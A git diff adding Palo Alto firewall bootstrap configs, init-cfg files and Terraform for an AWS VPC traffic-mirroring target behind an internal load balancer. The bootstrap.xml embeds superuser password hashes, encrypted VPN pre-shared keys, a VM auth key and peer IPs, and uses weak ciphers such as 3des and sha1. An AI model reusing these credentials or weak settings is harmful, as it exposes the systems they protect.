+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <custom-url-category/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/authcodes b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml
new file mode 100644
index 00000000..47244dd3
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml
@@ -0,0 +1,1018 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cweppdgb$pU2XxH3TD.QyD29.TXnVT.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kouigbds$mrNbt/msQehCS55jxNnYa.</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+                <interface-management-profile>LB HealthCheck</interface-management-profile>
+              </layer3>
+              <link-state>up</link-state>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+              <link-state>down</link-state>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="LB HealthCheck">
+              <http>yes</http>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <panorama-server>18.224.86.63</panorama-server>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>382932559738703</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3/>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3/>
+              </network>
+            </entry>
+            <entry name="mirror">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Mirror" uuid="737b22fb-872e-4a9e-811b-8489ca19a32e">
+                  <to>
+                    <member>mirror</member>
+                  </to>
+                  <from>
+                    <member>mirror</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT" uuid="15fd5339-09b4-4e44-964b-8f900d99a75e">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1" uuid="c12a4b77-9742-4035-b1a1-f166c3626fd8">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2" uuid="ddb09b41-3f36-4419-9b9e-daf33697d276">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1" uuid="e2581a90-3016-4ea5-87b7-dad8ad74372f">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2" uuid="dc4b1a56-4681-4a98-803b-41cfacb37e76">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW" uuid="07097b54-9c54-48e6-88cc-fd5f7b4445ef">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="31e54e4c-a95a-4e42-9600-cff312dc1178">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="47e6793d-f393-408e-bced-739fdaed964f">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <tunnel-inspect>
+              <rules>
+                <entry name="mirror" uuid="073a6b9a-342f-4fbd-8090-445752b19a31">
+                  <monitor-options>
+                    <log-setting-override>
+                      <enable>no</enable>
+                    </log-setting-override>
+                  </monitor-options>
+                  <application>
+                    <member>vxlan</member>
+                  </application>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                </entry>
+              </rules>
+            </tunnel-inspect>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <custom-url-category/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/VPC_Mirror_Target/nlb.tf b/aws/VPC_Mirror_Target/nlb.tf
new file mode 100644
index 00000000..3835c45f
--- /dev/null
+++ b/aws/VPC_Mirror_Target/nlb.tf
@@ -0,0 +1,39 @@
+resource "aws_lb" "mirror-lb" {
+  name               = "mirror-lb-tf"
+  internal           = true
+  load_balancer_type = "network"
+  subnets            = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"]
+  
+  enable_deletion_protection = false
+  enable_cross_zone_load_balancing = true
+  tags = {
+  }
+}
+resource "aws_lb_target_group" "mirror-target" {
+  name     = "mirror-target"
+  port     = 4789
+  protocol = "UDP"
+  vpc_id   = "${aws_vpc.vpc_security.id}"
+  health_check {
+      port = 80
+      protocol = "HTTP"
+  }
+}
+resource "aws_lb_listener" "mirror-listener" {
+  load_balancer_arn = "${aws_lb.mirror-lb.arn}"
+  port              = "4789"
+  protocol          = "UDP"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  }
+}
+resource "aws_lb_target_group_attachment" "mirror1" {
+  target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  target_id        = "${module.ngfw3.instanceid}"
+}
+resource "aws_lb_target_group_attachment" "mirror3" {
+  target_group_arn = "${aws_lb_target_group.mirror-target.arn}"
+  target_id        = "${module.ngfw4.instanceid}"
+}
\ No newline at end of file
diff --git a/aws/VPC_Mirror_Target/providers.tf b/aws/VPC_Mirror_Target/providers.tf
new file mode 100644
index 00000000..af7b0ba3
--- /dev/null
+++ b/aws/VPC_Mirror_Target/providers.tf
@@ -0,0 +1,3 @@
+provider "aws" {
+  region     = "${var.aws_region}"
+}
diff --git a/aws/VPC_Mirror_Target/variables.tf b/aws/VPC_Mirror_Target/variables.tf
new file mode 100644
index 00000000..184e2854
--- /dev/null
+++ b/aws/VPC_Mirror_Target/variables.tf
